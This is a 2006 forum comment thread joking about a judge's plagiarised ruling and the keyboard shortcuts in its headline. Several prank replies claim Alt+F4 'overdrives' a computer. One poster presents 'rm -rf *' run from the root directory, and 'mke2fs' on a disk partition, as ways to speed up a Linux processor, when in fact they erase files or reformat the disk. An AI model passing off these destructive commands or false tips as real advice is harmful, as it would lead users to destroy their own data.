She would have never got caught if she had just used ALT + F4. A command so useful, even Apple users wish they had it ...

2006-03-23 06:36:49 PM
Don't judges almost always go back and look at old cases when making judgments?

What good is a law library if you can't use what's in it?

/just sayin'
/no legal experience whatsoever

Ah, screw it. Windows key + U + S....

F5 gets rid of the original in what program? It's still not coming to me

2006-03-23 06:38:08 PM
why do they need judges? Isn't it just an island full of criminals anyways?

how else are they going to learn how to live like the rest of us decent humans ?

2006-03-23 06:40:15 PM
Like American judges don't do this. I've read federal judge opinions copied from attorney briefs, word for word including spelling errors.

2006-03-23 06:41:05 PM
Why does the judge want infinite lives and all the guns?

2006-03-23 06:41:27 PM
For those who don't know, pressing the Keys "Alt" and "F4" together is how you get a "TotalFark" tag.

/Shame this isn't IRC

alt+F4 ,when held down, also will overdrive your computer

She should go work for Research In Motion in HR.

/think about it.

2006-03-23 06:44:30 PM
Her plagiarism will cost taxpayers tens of thousands of dollars

Worth pointing out to those who think PC-ness is more betterer than firing-ness. The latter is cheaper and equally effective.

So if you Shepardize the plagiarised case, what will it say about Rimmer's decision?
I'm just glad Judge Wapner didn't live to see this.

I was thinking web browser shortcuts:
Cut (out of a form, perhaps?)
Paste
Reload page
New window
Cut
Paste

/Then again, that doesn't make a lot of sense...

In Linux, you can't use that, you have to enter the following commands to overdrive your processor:

cd ./
rm -rf *

OR you can use the one-liner:

mke2fs -j /dev/hda1 (or sda1 for a SCSI system)

2006-03-23 07:02:54 PM
My bad, it's:

cd /
rm -rf *

I work for someone who just copies and pastes stuff that someone else did.

So I am really getting a kick out of most of these replies.

Some of you guys are very good at making it sound like you know what you are talking about.

But trust me.... You don't.

I think you just want to make yourself sound smart, when in reality you dont know what you are talking about.

This is how bad info gets passed around.

If you dont know about the topic....Dont make yourself sound like you do.

Cuz some Farkers belive anything they hear.

I'm a keyboard shortcut savvy type person, but the headline has me confused. In Word at least, F5 is find and replace (actually Go To, but same window), so the only thing I can think of to explain it is

Cut from original
Paste into blank document
Find and replace occurrences of their name with yours
New document (another?)
Cut from modified original
Paste into blank document and save as own

But that still doesn't work because why would you need to cut and paste it twice...

If it was from a web page preferably you'd copy instead of cut, but that's no big deal. However if F5 is in there to refresh the page (erase form) why would you want to paste before refreshing, then... then open a new instance of the same window and cut and paste again?

I need to sit down...

and the uncalledfor anger from a farker. i'm pretty sure farkers don't take all this so dang seriously. if we did, this wouldn't be fark.

/that being said, chill out

people like to share their knowledge. doesn't mean they think they know everything.

i appreciate the computer alt+blahblah help input from everyone. like i said i didn't really know alot of shortcut/technical/whateveryouwannacallit stuff about computers.

Easier...

Alt + F + A
whatever +

2006-03-23 07:13:45 PM
No, "Alt" and "F4" is what people told me to use to get uber god mode and all weapons in Counter-Strike. I guess my computer wasn't powerful enough, because it just closed out of the game.

/I might have to change my processor fluid.
//or hard drive bearings.
